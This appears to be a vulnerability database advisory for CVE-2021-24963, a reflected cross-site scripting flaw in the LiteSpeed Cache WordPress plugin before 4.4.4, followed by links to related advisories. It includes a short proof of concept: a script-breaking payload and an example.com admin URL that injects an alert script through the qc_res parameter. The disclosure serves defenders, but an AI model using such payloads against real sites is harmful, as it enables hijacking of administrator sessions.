Lucene search
Emil KylanderWPEX-ID:7F8B4275-7586-4E04-AFD9-D12BDAB6BA9BHistoryNov 30, 2021 - 12:00 a.m.
LiteSpeed Cache < 4.4.4 - Admin+ Reflected Cross-Site Scripting
2021-11-3000:00:00
Emil Kylander
54
0.001 Low
EPSS
Percentile
21.6%
The plugin does not escape the qc_res parameter before outputting it back in the JS code of an admin page, leading to a Reflected Cross-Site Scripting
As admin, enter the following payload in the Domain Key setting of the plugin: </script><script>
Then open https://example.com/wp-admin/admin.php?page=litespeed-general&qc_res=</script><script>alert(/XSS/)</script>&domain_hash=541a0e1df04a2a5b7e4bd3472ff596ccRelated
cvelist
cvelist
nvd
nvd
CVE-2021-24963
2022-01-03 13:15:08
cve
cve
CVE-2021-24963
2022-01-03 13:15:08
wpvulndb
wpvulndb
LiteSpeed Cache < 4.4.4 - Admin+ Reflected Cross-Site Scripting
2021-11-30 00:00:00
prion
prion
Cross site scripting
2022-01-03 13:15:00
patchstack
patchstack
cnvd
cnvd
WordPress plugin LiteSpeed Cache cross-site scripting vulnerability
2022-01-05 00:00:00
openvas
openvas
WordPress LiteSpeed Cache Plugin < 4.4.4 Multiple Vulnerabilities
2022-06-24 00:00:00